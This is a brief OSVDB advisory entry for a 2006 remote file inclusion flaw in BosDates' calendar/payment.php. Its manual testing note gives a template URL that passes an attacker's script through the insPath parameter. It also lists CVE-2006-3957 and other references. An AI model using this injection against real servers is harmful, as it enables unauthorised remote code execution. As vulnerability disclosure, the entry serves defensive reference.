BosDates payment.php insPath Variable Remote File Inclusion

2006-07-27T22:08:37
ID OSVDB:29869
Type osvdb
Reporter OSVDB
Modified 2006-07-27T22:08:37

Description

Manual Testing Notes

http://[target]/calendar/payment.php?insPath=[evil_script]

References:

Security Tracker: 1016585 Generic Exploit URL: http://www.jaascois.com/exploits/18602020 CVE-2006-3957 Bugtraq ID: 19191